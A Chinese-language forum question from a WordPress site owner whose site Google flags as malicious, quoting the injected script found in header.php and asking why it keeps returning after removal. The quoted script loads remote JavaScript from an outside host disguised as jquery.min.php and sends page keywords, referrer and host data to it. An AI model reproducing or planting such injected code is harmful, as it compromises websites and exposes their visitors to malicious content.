我有一个Wordpress网站经常被Google标记为恶意软件:
https://www.google.com/transparencyreport/safebrowsing/diagnostic/#url=damonanddoras.com
这是我的
header.php
文件:
<script>var a=\'\';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==\'\'||document.referrer!==null){document.write(\'<script type="text/javascript" src="http://thatching.co.za/js/jquery.min.php?c_utt=K85164&c_utm=\'+encodeURIComponent(\'http://thatching.co.za/js/jquery.min.php\'+\'?\'+\'default_keyword=\'+encodeURIComponent(((k=(function(){var keywords=\'\';var metas=document.getElementsByTagName(\'meta\');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==\'\'?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?\'\':t:v[1]:k))+\'&se_referrer=\'+encodeURIComponent(document.referrer)+\'&source=\'+encodeURIComponent(window.location.host))+\'"><\'+\'/script>\');}</script>
每次我删除该行,或者用jQuery CDN URL替换外部URL时,都会编辑文件并更新不同的URL。
有什么想法吗?